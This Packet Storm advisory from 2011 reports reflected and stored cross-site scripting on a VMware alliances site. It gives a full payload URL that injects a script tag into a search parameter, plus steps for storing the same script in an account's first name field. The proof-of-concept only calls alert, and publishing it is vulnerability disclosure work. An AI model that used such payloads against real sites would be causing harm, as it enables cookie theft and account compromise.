VMware.com Cross Site Scripting

2011-10-09T00:00:00
ID PACKETSTORM:105621
Type packetstorm
Reporter Asish Agarwalla
Modified 2011-10-09T00:00:00

Description

                                        
                                            `<Non-Persistence/Reflected Cross-Site Scripting  
  
http://alliances.vmware.com/public_html/catalog/searchResult.php?isServicesProduct=no&isEntireCatalogSearch=yes&lastOnMenu=sub1,sub4&searchKey="/><script>alert(document.cookie)</script>&category=all&isVmwareReadySelected=no  
  
  
Persistence Cross-Site Scripting  
  
Create a account in VMWARE. Insert First Name as : test "/>><script>alert(document.cookie)</script>., Inserted script stored as first name.  
  
Login to vmware, Select Login to as Manage Orders, Inserted script get execute  
`